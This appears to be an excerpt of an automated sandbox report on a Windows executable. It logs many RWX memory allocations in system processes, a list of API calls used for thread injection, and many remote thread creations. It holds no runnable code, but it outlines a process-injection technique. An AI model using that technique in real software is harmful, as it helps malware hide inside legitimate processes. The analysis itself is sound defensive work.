        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: FF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 480000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 960000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 880000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: DD50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 6B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 920000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1000000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 620000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 600000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 700000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 490000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 970000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 890000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: DD60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 380000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 6C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 200000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1010000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 240000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 630000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: C00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 240000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 710000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: DD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 4A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: DD70000 protect: page execute and read and writeJump to behavior
        Contains functionality to inject threads in other processes
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0242CC92 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,FindCloseChangeNotification,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,CloseHandle,GetProcessHeap,HeapFree,6_2_0242CC92
        Creates a thread in another existing process (thread injection)
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: C:\Windows\SysWOW64\cscript.exe EIP: 4980000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: C:\Windows\SysWOW64\cscript.exe EIP: 49E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 6B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 6C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2E80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2ED0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 23C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2410000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 27F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2940000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2350000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 26A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2790000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2550000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 25A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 30D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 6C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: C30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1270000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 20D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 23D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 24F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2720000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2770000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 570000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 580000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2840000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2CA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2CF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2990000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 29E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 26B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2700000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2DF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 29A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 29B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: C90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 21D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2220000Jump to behavior
